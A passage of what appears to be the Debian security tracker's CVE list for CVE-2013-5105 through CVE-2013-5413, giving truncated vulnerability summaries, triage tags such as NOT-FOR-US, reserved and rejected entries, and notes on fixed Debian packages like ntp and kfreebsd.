CVE-2013-5413 (IBM Sterling B2B Integrator 5.2 and Sterling File Gateway 2.2 do not i ...)
	NOT-FOR-US: IBM
CVE-2013-5412 RESERVED
CVE-2013-5411 (IBM Sterling B2B Integrator 5.2 and Sterling File Gateway 2.2 allow re ...)
	NOT-FOR-US: IBM
CVE-2013-5410 RESERVED
CVE-2013-5409 (Multiple SQL injection vulnerabilities in IBM Sterling B2B Integrator ...)
	NOT-FOR-US: IBM
CVE-2013-5408 RESERVED
CVE-2013-5407 (IBM Sterling B2B Integrator 5.2 and Sterling File Gateway 2.2 do not p ...)
	NOT-FOR-US: IBM
CVE-2013-5406 (Multiple cross-site scripting (XSS) vulnerabilities in IBM Sterling B2 ...)
	NOT-FOR-US: IBM
CVE-2013-5405 (Multiple cross-site scripting (XSS) vulnerabilities in IBM Sterling B2 ...)
	NOT-FOR-US: IBM
CVE-2013-5404 (Cross-site scripting (XSS) vulnerability in the search implementation ...)
	NOT-FOR-US: IBM Rational Quality Manager
CVE-2013-5403 (Unspecified vulnerability on the IBM WebSphere DataPower XC10 applianc ...)
	NOT-FOR-US: IBM WebSphere
CVE-2013-5402 (Cross-site scripting (XSS) vulnerability in IBM Maximo Asset Managemen ...)
	NOT-FOR-US: IBM
CVE-2013-5401 (The command-port listener in IBM WebSphere MQ Internet Pass-Thru (MQIP ...)
	NOT-FOR-US: IBM WebSphere MQ
CVE-2013-5400 (An unspecified servlet in IBM Platform Symphony Developer Edition (DE) ...)
	NOT-FOR-US: IBM Platform Symphony Developer Edition
CVE-2013-5399 RESERVED
CVE-2013-5398 (Unspecified vulnerability in the Webservice Axis Gateway in IBM Ration ...)
	NOT-FOR-US: IBM
CVE-2013-5397 (Unspecified vulnerability in the Webservice Axis Gateway in IBM Ration ...)
	NOT-FOR-US: IBM
CVE-2013-5396 RESERVED
CVE-2013-5395 (IBM Maximo Asset Management 6.2 through 6.2.8, 7.1 before 7.1.1.12, an ...)
	NOT-FOR-US: IBM Maximo Asset Management
CVE-2013-5394 (The monitoring console in IBM WebSphere eXtreme Scale 7.1.0, 7.1.1, 8. ...)
	NOT-FOR-US: IBM WebSphere eXtreme Scale
CVE-2013-5393 (The monitoring console in IBM WebSphere eXtreme Scale 7.1.0, 7.1.1, 8. ...)
	NOT-FOR-US: IBM WebSphere eXtreme Scale
CVE-2013-5392 RESERVED
CVE-2013-5391 (IBM Worklight Consumer and Enterprise Editions 5.0.x before 5.0.6 Fix ...)
	NOT-FOR-US: IBM
CVE-2013-5390 (Cross-site scripting (XSS) vulnerability in the monitoring console in ...)
	NOT-FOR-US: IBM WebSphere eXtreme Scale
CVE-2013-5389 (Cross-site scripting (XSS) vulnerability in iNotes in IBM Domino 8.5.3 ...)
	NOT-FOR-US: IBM Domino
CVE-2013-5388 (Cross-site scripting (XSS) vulnerability in iNotes in IBM Domino 8.5.3 ...)
	NOT-FOR-US: IBM Domino
CVE-2013-5387 (Buffer overflow in IBM Platform Symphony 5.2, 6.1, and 6.1.1 allows re ...)
	NOT-FOR-US: IBM
CVE-2013-5386 RESERVED
CVE-2013-5385 (The OSPF implementation in IBM i 6.1 and 7.1, in z/OS on zSeries serve ...)
	NOT-FOR-US: IBM
CVE-2013-5384 RESERVED
CVE-2013-5383 (IBM Maximo Asset Management 6.2 through 6.2.8, 7.1 before 7.1.1.12, an ...)
	NOT-FOR-US: IBM Maximo Asset Management
CVE-2013-5382 (IBM Maximo Asset Management 6.2 through 6.2.8, 7.1 before 7.1.1.12, an ...)
	NOT-FOR-US: IBM Maximo Asset Management
CVE-2013-5381 (IBM Maximo Asset Management 6.2 through 6.2.8, 7.1 through 7.1.1.12, a ...)
	NOT-FOR-US: IBM Maximo Asset Management
CVE-2013-5380 (IBM Maximo Asset Management 6.2 through 6.2.8, 7.1 before 7.1.1.12, an ...)
	NOT-FOR-US: IBM Maximo Asset Management
CVE-2013-5379 (Cross-site scripting (XSS) vulnerability in IBM WebSphere Portal 7.x b ...)
	NOT-FOR-US: IBM WebSphere Portal
CVE-2013-5378 (Cross-site scripting (XSS) vulnerability in IBM WebSphere Portal 8.x b ...)
	NOT-FOR-US: IBM WebSphere Portal
CVE-2013-5377 RESERVED
CVE-2013-5376 (Cross-site scripting (XSS) vulnerability in IBM Storwize V7000 Unified ...)
	NOT-FOR-US: IBM Storwize V7000 Unified
CVE-2013-5375 (Unspecified vulnerability in IBM Java SDK 7.0.0 before SR6, 6.0.1 befo ...)
	NOT-FOR-US: IBM JDK
CVE-2013-5374 RESERVED
CVE-2013-5373 (The RemoteClient component in IBM Rational ClearCase 8.0.0.03 through ...)
	NOT-FOR-US: IBM Rational ClearCase
CVE-2013-5372 (The XML4J parser in IBM WebSphere Message Broker 6.1 before 6.1.0.12, ...)
	NOT-FOR-US: IBM
CVE-2013-5371 (The client in IBM Tivoli Storage Manager (TSM) 6.3.1 and 6.4.0 on Wind ...)
	NOT-FOR-US: IBM Tivoli Storage Manager
CVE-2013-5370 (Unspecified vulnerability in IBM SPSS Collaboration and Deployment Ser ...)
	NOT-FOR-US: IBM SPSS Collaboration and Deployment Services
CVE-2013-5369 (IBM SPSS Analytical Decision Management 6.1 before IF1, 6.2 before IF1 ...)
	NOT-FOR-US: IBM SPSS Analytical Decision Management
CVE-2013-5368 RESERVED
CVE-2013-5367 RESERVED
CVE-2013-5366 RESERVED
CVE-2013-5365 (Heap-based buffer overflow in Autodesk SketchBook for Enterprise 2014, ...)
	NOT-FOR-US: Autodesk SketchBook
CVE-2013-5364 (Secunia CSI Agent 6.0.0.15017 and earlier, 6.0.1.1007 and earlier, and ...)
	NOT-FOR-US: Secunia CSI Agent
CVE-2013-5363 RESERVED
CVE-2013-5362 RESERVED
CVE-2013-5361 RESERVED
CVE-2013-5360 RESERVED
CVE-2013-5359 (Stack-based buffer overflow in Picasa3.exe in Google Picasa before 3.9 ...)
	NOT-FOR-US: Google Picasa
CVE-2013-5358 (Picasa3.exe in Google Picasa before 3.9.0 Build 137.69 allows remote a ...)
	NOT-FOR-US: Google Picasa
CVE-2013-5357 (Integer overflow in Picasa3.exe in Google Picasa before 3.9.0 Build 13 ...)
	NOT-FOR-US: Google Picasa
CVE-2013-5356 (Sharetronix 3.1.1.3, 3.1.1, and earlier does not properly restrict acc ...)
	NOT-FOR-US: Sharetronix
CVE-2013-5355 (Multiple cross-site request forgery (CSRF) vulnerabilities in Sharetro ...)
	NOT-FOR-US: Sharetronix
CVE-2013-5354 (Multiple SQL injection vulnerabilities in Sharetronix 3.1.1 allow remo ...)
	NOT-FOR-US: Sharetronix
CVE-2013-5353 (Unrestricted file upload vulnerability in system/controllers/ajax/atta ...)
	NOT-FOR-US: Sharetronix
CVE-2013-5352 (Sharetronix 3.1.1.3, 3.1.1, and earlier allows remote attackers to exe ...)
	NOT-FOR-US: Sharetronix
CVE-2013-5351 (Heap-based buffer overflow in IrfanView before 4.37 allows remote atta ...)
	NOT-FOR-US: IrfanView
CVE-2013-5350 (The "Remember me" feature in the opSecurityUser::getRememberLoginCooki ...)
	NOT-FOR-US: OpenPNE
CVE-2013-5349 (Integer underflow in Picasa3.exe in Google Picasa before 3.9.0 Build 1 ...)
	NOT-FOR-US: Google Picasa
CVE-2013-5348 REJECTED
CVE-2013-5347 REJECTED
CVE-2013-5346 REJECTED
CVE-2013-5345 REJECTED
CVE-2013-5344 REJECTED
CVE-2013-5343 REJECTED
CVE-2013-5342 REJECTED
CVE-2013-5341 REJECTED
CVE-2013-5340 REJECTED
CVE-2013-5339 REJECTED
CVE-2013-5338 REJECTED
CVE-2013-5337 REJECTED
CVE-2013-5336 REJECTED
CVE-2013-5335 REJECTED
CVE-2013-5334 (Adobe Shockwave Player before 12.0.7.148 allows attackers to execute a ...)
	NOT-FOR-US: Adobe Shockwave Player
CVE-2013-5333 (Adobe Shockwave Player before 12.0.7.148 allows attackers to execute a ...)
	NOT-FOR-US: Adobe Shockwave Player
CVE-2013-5332 (Adobe Flash Player before 11.7.700.257 and 11.8.x and 11.9.x before 11 ...)
	NOT-FOR-US: Adobe Flash Player
CVE-2013-5331 (Adobe Flash Player before 11.7.700.257 and 11.8.x and 11.9.x before 11 ...)
	NOT-FOR-US: Adobe Flash Player
CVE-2013-5330 (Adobe Flash Player before 11.7.700.252 and 11.8.x and 11.9.x before 11 ...)
	NOT-FOR-US: Adobe Flash Player
CVE-2013-5329 (Adobe Flash Player before 11.7.700.252 and 11.8.x and 11.9.x before 11 ...)
	NOT-FOR-US: Adobe Flash Player
CVE-2013-5328 (Adobe ColdFusion 10 before Update 12 allows remote attackers to read a ...)
	NOT-FOR-US: Adobe ColdFusion
CVE-2013-5327 (MDBMS.dll in Adobe RoboHelp 10 allows attackers to execute arbitrary c ...)
	NOT-FOR-US: Adobe RoboHelp
CVE-2013-5326 (Cross-site scripting (XSS) vulnerability in Adobe ColdFusion 9.0 befor ...)
	NOT-FOR-US: Adobe ColdFusion
CVE-2013-5325 (Adobe Reader and Acrobat 11.x before 11.0.05 on Windows allow remote a ...)
	NOT-FOR-US: Adobe
CVE-2013-5324 (Adobe Flash Player before 11.7.700.242 and 11.8.x before 11.8.800.168 ...)
	NOT-FOR-US: Adobe Flash Player
CVE-2013-5323 (Cross-site scripting (XSS) vulnerability in the Static Info Tables (st ...)
	NOT-FOR-US: TYPO3 extension (Static Info Tables)
CVE-2013-5322 (SQL injection vulnerability in the CoolURI extension before 1.0.30 for ...)
	NOT-FOR-US: TYPO3 extension (CoolURI)
CVE-2013-5321 (Multiple SQL injection vulnerabilities in AlienVault Open Source Secur ...)
	NOT-FOR-US: AlienVault Open Source Security Information Management
CVE-2013-5320 (Cross-site scripting (XSS) vulnerability in Forums/EditPost.aspx in mo ...)
	NOT-FOR-US: mojoPortal
CVE-2013-5319 (Cross-site scripting (XSS) vulnerability in secure/admin/user/views/de ...)
	NOT-FOR-US: Atlassian JIRA
CVE-2013-5318 (SQL injection vulnerability in Ginkgo CMS 5.0 allows remote attackers ...)
	NOT-FOR-US: Ginkgo CMS
CVE-2013-5317 (Cross-site scripting (XSS) vulnerability in RiteCMS 1.0.0 allows remot ...)
	NOT-FOR-US: RiteCMS
CVE-2013-5316 (Cross-site request forgery (CSRF) vulnerability in RiteCMS 1.0.0 allow ...)
	NOT-FOR-US: RiteCMS
CVE-2013-5313 (Cross-site request forgery (CSRF) vulnerability in core/admin/modules/ ...)
	NOT-FOR-US: BigTree CMS
CVE-2013-5312 (Multiple cross-site scripting (XSS) vulnerabilities in Vastal I-Tech p ...)
	NOT-FOR-US: Vastal I-Tech phpVID
CVE-2013-5311 (Multiple SQL injection vulnerabilities in Vastal I-Tech phpVID 1.2.3 a ...)
	NOT-FOR-US: Vastal I-Tech phpVID
CVE-2013-5315 (Cross-site scripting (XSS) vulnerability in the Resource Manager in th ...)
	NOT-FOR-US: Drupal module
CVE-2013-5314 (Cross-site scripting (XSS) vulnerability in serendipity_admin_image_se ...)
	- serendipity
	[squeeze] - serendipity (Unsupported in squeeze-lts)
CVE-2013-5310 (SQL injection vulnerability in the DB Integration (wfqbe) extension be ...)
	NOT-FOR-US: TYPO3 extension
CVE-2013-5309 (Cross-site scripting (XSS) vulnerability in install/forum_data/src/cus ...)
	NOT-FOR-US: FUDforum
CVE-2013-5308 (Cross-site scripting (XSS) vulnerability in the RealURL Management (re ...)
	NOT-FOR-US: TYPO3 extension
CVE-2013-5307 (Cross-site scripting (XSS) vulnerability in the Faceted Search (ke_sea ...)
	NOT-FOR-US: Faceted Search TYPO3 extension
CVE-2013-5306 (SQL injection vulnerability in the Browser - TYPO3 without PHP (browse ...)
	NOT-FOR-US: TYPO3 Extension
CVE-2013-5305 (Cross-site scripting (XSS) vulnerability in the Store Locator (locator ...)
	NOT-FOR-US: typo3 third party component (locator)
CVE-2013-5304 (SQL injection vulnerability in the Store Locator (locator) extension b ...)
	NOT-FOR-US: typo3 third party component (locator)
CVE-2013-5303 (Unspecified vulnerability in the Store Locator (locator) extension bef ...)
	NOT-FOR-US: typo3 third party component (locator)
CVE-2013-5302 (SQL injection vulnerability in the Faceted Search (ke_search) extensio ...)
	NOT-FOR-US: Faceted Search TYPO3 extension
CVE-2013-5301 (Directory traversal vulnerability in help.php in Trustport Webfilter 5 ...)
	NOT-FOR-US: Trustport Webfilter
CVE-2013-5300 (Multiple cross-site scripting (XSS) vulnerabilities in AlienVault Open ...)
	NOT-FOR-US: AlienVault OSSIM
CVE-2013-5299 RESERVED
CVE-2013-5298 RESERVED
CVE-2013-5297 RESERVED
CVE-2013-5296 RESERVED
CVE-2013-5295 RESERVED
CVE-2013-5294 RESERVED
CVE-2013-5293 RESERVED
CVE-2013-5292 RESERVED
CVE-2013-5291 RESERVED
CVE-2013-5290 RESERVED
CVE-2013-5289 RESERVED
CVE-2013-5288 RESERVED
CVE-2013-5287 RESERVED
CVE-2013-5286 RESERVED
CVE-2013-5285 RESERVED
CVE-2013-5284 RESERVED
CVE-2013-5283 RESERVED
CVE-2013-5282 RESERVED
CVE-2013-5281 RESERVED
CVE-2013-5280 RESERVED
CVE-2013-5279 RESERVED
CVE-2013-5278 RESERVED
CVE-2013-5277 RESERVED
CVE-2013-5276 RESERVED
CVE-2013-5275 RESERVED
CVE-2013-5274 RESERVED
CVE-2013-5273 RESERVED
CVE-2013-5272 RESERVED
CVE-2013-5271 RESERVED
CVE-2013-5270 RESERVED
CVE-2013-5269 RESERVED
CVE-2013-5268 RESERVED
CVE-2013-5267 RESERVED
CVE-2013-5266 RESERVED
CVE-2013-5265 RESERVED
CVE-2013-5264 RESERVED
CVE-2013-5263 RESERVED
CVE-2013-5262 RESERVED
CVE-2013-5261 RESERVED
CVE-2013-5260 RESERVED
CVE-2013-5259 RESERVED
CVE-2013-5258 RESERVED
CVE-2013-5257 RESERVED
CVE-2013-5256 RESERVED
CVE-2013-5255 RESERVED
CVE-2013-5254 RESERVED
CVE-2013-5253 RESERVED
CVE-2013-5252 RESERVED
CVE-2013-5251 RESERVED
CVE-2013-5250 RESERVED
CVE-2013-5249 RESERVED
CVE-2013-5248 RESERVED
CVE-2013-5247 RESERVED
CVE-2013-5246 RESERVED
CVE-2013-5245 RESERVED
CVE-2013-5244 RESERVED
CVE-2013-5243 RESERVED
CVE-2013-5242 RESERVED
CVE-2013-5241 RESERVED
CVE-2013-5240 RESERVED
CVE-2013-5239 RESERVED
CVE-2013-5238 RESERVED
CVE-2013-5237 RESERVED
CVE-2013-5236 RESERVED
CVE-2013-5235 RESERVED
CVE-2013-5234 RESERVED
CVE-2013-5233 RESERVED
CVE-2013-5232 RESERVED
CVE-2013-5231 RESERVED
CVE-2013-5230 RESERVED
CVE-2013-5229 (The Remote Desktop full-screen feature in Apple OS X before 10.9 and A ...)
	NOT-FOR-US: Apple
CVE-2013-5228 (WebKit, as used in Apple Safari before 6.1.1 and 7.x before 7.0.1, all ...)
	NOT-FOR-US: Webkit / if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2013-5227 (Apple Safari before 6.1.1 and 7.x before 7.0.1 allows remote attackers ...)
	NOT-FOR-US: Safari
CVE-2013-5226 RESERVED
CVE-2013-5225 (WebKit, as used in Apple Safari before 6.1.1 and 7.x before 7.0.1, all ...)
	NOT-FOR-US: Webkit / if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2013-5224 RESERVED
CVE-2013-5223 (Multiple cross-site scripting (XSS) vulnerabilities in D-Link DSL-2760 ...)
	NOT-FOR-US: D-Link DSL-2760U Gateway
CVE-2013-5222 (Multiple cross-site scripting (XSS) vulnerabilities in ESRI ArcGIS for ...)
	NOT-FOR-US: ESRI ArcGIS
CVE-2013-5221 (The mobile-upload feature in Esri ArcGIS for Server 10.1 through 10.2 ...)
	NOT-FOR-US: Esri ArcGIS
CVE-2013-5220 (goform/login on the HOT HOTBOX router with software 2.1.11 allows remo ...)
	NOT-FOR-US: HOT HOTBOX router
CVE-2013-5219 (Directory traversal vulnerability on the HOT HOTBOX router with softwa ...)
	NOT-FOR-US: HOT HOTBOX router
CVE-2013-5218 (Cross-site scripting (XSS) vulnerability on the HOT HOTBOX router with ...)
	NOT-FOR-US: HOT HOTBOX router
CVE-2013-5216 (Directory traversal vulnerability in logreader/uploadreader.jsp in Cap ...)
	NOT-FOR-US: Performance Guard
CVE-2013-5215 (Cross-site scripting (XSS) vulnerability in the web interface "WiFi sc ...)
	NOT-FOR-US: FOSCAM Wireless IP Camera
CVE-2013-5214 RESERVED
CVE-2013-5213 RESERVED
CVE-2013-5212 (Cross-site Scripting (XSS) in EasyXDM before 2.4.18 allows remote atta ...)
	NOT-FOR-US: easyXDM
CVE-2013-5211 (The monlist feature in ntp_request.c in ntpd in NTP before 4.2.7p26 al ...)
	- ntp 1:4.2.8p3+dfsg-1 (low; bug #733940)
	[jessie] - ntp (No backportable code fix exists, default configuration is safe, tiny subsection of affected users can run a backport)
	[wheezy] - ntp (No backportable code fix exists, default configuration is safe, tiny subsection of affected users can run a backport)
	[squeeze] - ntp (No backportable code fix exists, default configuration is safe, tiny subsection of affected users can run a backport)
	NOTE: http://bugs.ntp.org/show_bug.cgi?id=1532
	NOTE: mitigated if noquery used. Only a problem for (public) ntp servers allowing
	NOTE: querying ntpd status, so allowing monlist
CVE-2013-5210 (Cross-site scripting (XSS) vulnerability in the GUI login page in ADTR ...)
	NOT-FOR-US: Adtran Netvanta
CVE-2013-5209 (The sctp_send_initiate_ack function in sys/netinet/sctp_output.c in th ...)
	{DSA-2743-1}
	- kfreebsd-8 (bug #720476)
	[wheezy] - kfreebsd-8 8.3-6+deb7u1
	[squeeze] - kfreebsd-8 (Unsupported in squeeze-lts)
	- kfreebsd-9 9.2~svn254368-2 (bug #720475)
	- kfreebsd-10 10.0~svn254663-1 (bug #720478)
CVE-2013-5208 (HR Systems Strategies info:HR HRIS 7.9 does not properly protect the d ...)
	NOT-FOR-US: HR Systems Strategies
CVE-2013-5207 RESERVED
CVE-2013-5206 RESERVED
CVE-2013-5205 RESERVED
CVE-2013-5204 RESERVED
CVE-2013-5203 RESERVED
CVE-2013-5202 RESERVED
CVE-2013-5201 RESERVED
CVE-2013-5200 (The (1) REST and (2) memcache interfaces in the Hazelcast cluster API ...)
	NOT-FOR-US: Open-Xchange
CVE-2013-5199 (WebKit, as used in Apple Safari before 6.1.1 and 7.x before 7.0.1, all ...)
	NOT-FOR-US: Webkit / if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2013-5198 (WebKit, as used in Apple Safari before 6.1.1 and 7.x before 7.0.1, all ...)
	NOT-FOR-US: Webkit / if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2013-5197 (WebKit, as used in Apple Safari before 6.1.1 and 7.x before 7.0.1, all ...)
	NOT-FOR-US: Webkit / if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2013-5196 (WebKit, as used in Apple Safari before 6.1.1 and 7.x before 7.0.1, all ...)
	NOT-FOR-US: Webkit / if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2013-5195 (WebKit, as used in Apple Safari before 6.1.1 and 7.x before 7.0.1, all ...)
	NOT-FOR-US: Webkit / if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2013-5194 RESERVED
CVE-2013-5193 (The App Store component in Apple iOS before 7.0.4 does not properly en ...)
	NOT-FOR-US: Apple
CVE-2013-5192 (The USB hub controller in Apple Mac OS X before 10.9 allows local user ...)
	NOT-FOR-US: Apple Mac OS X
CVE-2013-5191 (The syslog implementation in Apple Mac OS X before 10.9 allows local u ...)
	NOT-FOR-US: Apple Mac OS X
CVE-2013-5190 (Smart Card Services in Apple Mac OS X before 10.9 does not properly im ...)
	NOT-FOR-US: Apple Mac OS X
CVE-2013-5189 (Apple Mac OS X before 10.9 does not preserve a certain administrative ...)
	NOT-FOR-US: Apple Mac OS X
CVE-2013-5188 (The Screen Lock implementation in Apple Mac OS X before 10.9, when hib ...)
	NOT-FOR-US: Apple Mac OS X
CVE-2013-5187 (The Screen Lock implementation in Apple Mac OS X before 10.9 does not ...)
	NOT-FOR-US: Apple Mac OS X
CVE-2013-5186 (Power Management in Apple Mac OS X before 10.9 does not properly handl ...)
	NOT-FOR-US: Apple Mac OS X
CVE-2013-5185 (The ldapsearch command-line program in OpenLDAP in Apple Mac OS X befo ...)
	NOT-FOR-US: Apple Mac OS X
CVE-2013-5184 (The kernel in Apple Mac OS X before 10.9 does not properly check for e ...)
	NOT-FOR-US: Apple Mac OS X
CVE-2013-5183 (Mail in Apple Mac OS X before 10.9, when Kerberos authentication is en ...)
	NOT-FOR-US: Apple Mac OS X
CVE-2013-5182 (Mail in Apple Mac OS X before 10.9 allows remote attackers to spoof th ...)
	NOT-FOR-US: Apple Mac OS X
CVE-2013-5181 (The auto-configuration feature in Mail in Apple Mac OS X before 10.9 s ...)
	NOT-FOR-US: Apple Mac OS X
CVE-2013-5180 (The srandomdev function in Libc in Apple Mac OS X before 10.9, when th ...)
	NOT-FOR-US: Apple Mac OS X
CVE-2013-5179 (App Sandbox in Apple Mac OS X before 10.9 allows attackers to bypass i ...)
	NOT-FOR-US: Apple Mac OS X
CVE-2013-5178 (LaunchServices in Apple Mac OS X before 10.9 does not properly restric ...)
	NOT-FOR-US: Apple Mac OS X
CVE-2013-5177 (The kernel in Apple Mac OS X before 10.9 allows local users to cause a ...)
	NOT-FOR-US: Apple Mac OS X
CVE-2013-5176 (The kernel in Apple Mac OS X before 10.9 does not properly handle inte ...)
	NOT-FOR-US: Apple Mac OS X
CVE-2013-5175 (The kernel in Apple Mac OS X before 10.9 allows local users to obtain ...)
	NOT-FOR-US: Apple Mac OS X
CVE-2013-5174 (Integer signedness error in the kernel in Apple Mac OS X before 10.9 a ...)
	NOT-FOR-US: Apple Mac OS X
CVE-2013-5173 (The random-number generator in the kernel in Apple Mac OS X before 10. ...)
	NOT-FOR-US: Apple Mac OS X
CVE-2013-5172 (The kernel in Apple Mac OS X before 10.9 does not properly determine t ...)
	NOT-FOR-US: Apple Mac OS X
CVE-2013-5171 (CoreGraphics in Apple Mac OS X before 10.9 allows local users to bypas ...)
	NOT-FOR-US: Apple Mac OS X
CVE-2013-5170 (Buffer underflow in CoreGraphics in Apple Mac OS X before 10.9 allows ...)
	NOT-FOR-US: Apple Mac OS X
CVE-2013-5169 (CoreGraphics in Apple Mac OS X before 10.9, when display-sleep mode is ...)
	NOT-FOR-US: Apple Mac OS X
CVE-2013-5168 (Console in Apple Mac OS X before 10.9 allows user-assisted remote atta ...)
	NOT-FOR-US: Apple Mac OS X
CVE-2013-5167 (CFNetwork in Apple Mac OS X before 10.9 does not properly support Safa ...)
	NOT-FOR-US: Apple Mac OS X
CVE-2013-5166 (The Bluetooth USB host controller in Apple Mac OS X before 10.9 premat ...)
	NOT-FOR-US: Apple Mac OS X
CVE-2013-5165 (socketfilterfw in Application Firewall in Apple Mac OS X before 10.9 d ...)
	NOT-FOR-US: Apple Mac OS X
CVE-2013-5164 (Multiple race conditions in the Phone app in Apple iOS before 7.0.3 al ...)
	NOT-FOR-US: Apple iOS
CVE-2013-5163 (Directory Services in Apple Mac OS X before 10.8.5 Supplemental Update ...)
	NOT-FOR-US: Apple OS X
CVE-2013-5162 (Passcode Lock in Apple iOS before 7.0.3 on iPhone devices allows physi ...)
	NOT-FOR-US: Apple iOS
CVE-2013-5161 (Passcode Lock in Apple iOS before 7.0.2 does not properly manage the l ...)
	NOT-FOR-US: Apple iOS
CVE-2013-5160 (Passcode Lock in Apple iOS before 7.0.2 on iPhone devices allows physi ...)
	NOT-FOR-US: Apple iOS
CVE-2013-5159 (WebKit in Apple iOS before 7 allows remote attackers to bypass the Sam ...)
	NOT-FOR-US: Apple iOS
CVE-2013-5158 (The Social subsystem in Apple iOS before 7 does not properly restrict ...)
	NOT-FOR-US: Apple iOS
CVE-2013-5157 (The Twitter subsystem in Apple iOS before 7 does not require API confo ...)
	NOT-FOR-US: Apple iOS
CVE-2013-5156 (The Telephony subsystem in Apple iOS before 7 does not require API con ...)
	NOT-FOR-US: Apple iOS
CVE-2013-5155 (The Sandbox subsystem in Apple iOS before 7 allows attackers to cause ...)
	NOT-FOR-US: Apple iOS
CVE-2013-5154 (The Sandbox subsystem in Apple iOS before 7 determines the sandboxing ...)
	NOT-FOR-US: Apple iOS
CVE-2013-5153 (Springboard in Apple iOS before 7 does not properly manage the lock st ...)
	NOT-FOR-US: Apple iOS
CVE-2013-5152 (Mobile Safari in Apple iOS before 7 allows remote attackers to spoof t ...)
	NOT-FOR-US: Apple iOS
CVE-2013-5151 (Mobile Safari in Apple iOS before 7 does not prevent HTML interpretati ...)
	NOT-FOR-US: Apple iOS
CVE-2013-5150 (The history-clearing feature in Safari in Apple iOS before 7 does not ...)
	NOT-FOR-US: Apple iOS
CVE-2013-5149 (The Push Notifications subsystem in Apple iOS before 7 provides the pu ...)
	NOT-FOR-US: Apple iOS
CVE-2013-5148 (Apple Keynote before 6.0 does not properly handle the interaction betw ...)
	NOT-FOR-US: Apple Keynote
CVE-2013-5147 (Passcode Lock in Apple iOS before 7 does not properly manage the lock ...)
	NOT-FOR-US: Apple iOS
CVE-2013-5146 RESERVED
CVE-2013-5145 (kextd in Kext Management in Apple iOS before 7 does not properly verif ...)
	NOT-FOR-US: Apple iOS
CVE-2013-5144 (Passcode Lock in Apple iOS before 7.0.3 on iPhone devices allows physi ...)
	NOT-FOR-US: Apple iOS
CVE-2013-5143 (The RADIUS service in Server App in Apple OS X Server before 3.0 selec ...)
	NOT-FOR-US: Apple OS X Server
CVE-2013-5142 (The kernel in Apple iOS before 7 does not initialize unspecified kerne ...)
	NOT-FOR-US: Apple iOS
CVE-2013-5141 (The kernel in Apple iOS before 7 uses an incorrect data size for a cer ...)
	NOT-FOR-US: Apple iOS
CVE-2013-5140 (The kernel in Apple iOS before 7 allows remote attackers to cause a de ...)
	NOT-FOR-US: Apple iOS
CVE-2013-5139 (The IOSerialFamily driver in Apple iOS before 7 allows attackers to ex ...)
	NOT-FOR-US: Apple iOS
CVE-2013-5138 (IOCatalogue in IOKitUser in Apple iOS before 7 allows attackers to cau ...)
	NOT-FOR-US: Apple iOS
CVE-2013-5137 (IOKit in Apple iOS before 7 allows attackers to send user-interface ev ...)
	NOT-FOR-US: Apple iOS
CVE-2013-5136 (Apple Remote Desktop before 3.7 does not properly use server authentic ...)
	NOT-FOR-US: Apple Remote Desktop
CVE-2013-5135 (Format string vulnerability in Screen Sharing Server in Apple Mac OS X ...)
	NOT-FOR-US: Apple Mac OS X
CVE-2013-5134 REJECTED
CVE-2013-5133 (Backup in Apple iOS before 7.1 does not properly restrict symlinks, wh ...)
	NOT-FOR-US: Apple
CVE-2013-5132 (Apple AirPort Base Station Firmware before 7.6.4 does not properly han ...)
	NOT-FOR-US: Apple AirPort
CVE-2013-5131 (Cross-site scripting (XSS) vulnerability in WebKit in Apple iOS before ...)
	NOT-FOR-US: Apple iOS
CVE-2013-5130 (WebKit in Apple Safari before 6.1 disables the Private Browsing featur ...)
	NOT-FOR-US: Webkit / if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2013-5129 (Multiple cross-site scripting (XSS) vulnerabilities in WebKit in Apple ...)
	NOT-FOR-US: Apple iOS
CVE-2013-5128 (WebKit, as used in Apple iOS before 7, allows remote attackers to exec ...)
	NOT-FOR-US: Apple iOS
CVE-2013-5127 (WebKit, as used in Apple iOS before 7, allows remote attackers to exec ...)
	NOT-FOR-US: Apple iOS
CVE-2013-5126 (WebKit, as used in Apple iOS before 7, allows remote attackers to exec ...)
	NOT-FOR-US: Apple iOS
CVE-2013-5125 (WebKit, as used in Apple iOS before 7, allows remote attackers to exec ...)
	NOT-FOR-US: Apple iOS
CVE-2013-5124 RESERVED
CVE-2013-5123 (The mirroring support (-M, --use-mirrors) in Python Pip before 1.5 use ...)
	- python-pip 1.4.1-1 (unimportant)
	[squeeze] - python-pip (Support for mirroring introduced in 0.8.1)
	NOTE: This is an additional hardening / security feature, not a vulnerability (despite
	NOTE: the discussion on oss-sec)
CVE-2013-5122 (Cisco Linksys Routers EA2700, EA3500, E4200, EA4500: A bug can cause a ...)
	NOT-FOR-US: Linksys
CVE-2013-5121 (SQL injection vulnerability in PHPFox before 3.6.0 (build6) allows rem ...)
	NOT-FOR-US: PHPFox
CVE-2013-5120 (SQL injection vulnerability in PHPFox before 3.6.0 (build4) allows rem ...)
	NOT-FOR-US: PHPFox
CVE-2013-5119 (Zimbra Collaboration Suite (ZCS) 6.0.16 and earlier allows man-in-the- ...)
	NOT-FOR-US: Zimbra Collaboration Suite
CVE-2013-5118 (Cross-site scripting (XSS) vulnerability in the Good for Enterprise ap ...)
	NOT-FOR-US: Good for Enterprise app for iOS
CVE-2013-5117 (SQL injection vulnerability in the RSS page (DNNArticleRSS.aspx) in th ...)
	NOT-FOR-US: DotNetNuke
CVE-2013-5116 (Evernote prior to 5.5.1 has insecure password change ...)
	NOT-FOR-US: Evernote
CVE-2013-5115 RESERVED
CVE-2013-5114 (LastPass prior to 2.5.1 allows secure wipe bypass. ...)
	NOT-FOR-US: LastPass
CVE-2013-5113 (LastPass prior to 2.5.1 has an insecure PIN implementation. ...)
	NOT-FOR-US: LastPass
CVE-2013-5112 (Evernote before 5.5.1 has insecure PIN storage ...)
	NOT-FOR-US: Evernote
CVE-2013-5111 RESERVED
CVE-2013-5110 RESERVED
CVE-2013-5109 RESERVED
CVE-2013-5108 (Multiple cross-site scripting (XSS) vulnerabilities in the xn function ...)
	- rockmongo (bug #702961)
CVE-2013-5107 (Directory traversal vulnerability in RockMongo 1.1.5 and earlier allow ...)
	- rockmongo (bug #702961)
CVE-2013-5106 (A Code Execution vulnerability exists in select.py when using python-m ...)
	NOT-FOR-US: python vim mode, different from src:python-mode, which is for emacs
CVE-2013-5105 RESERVED
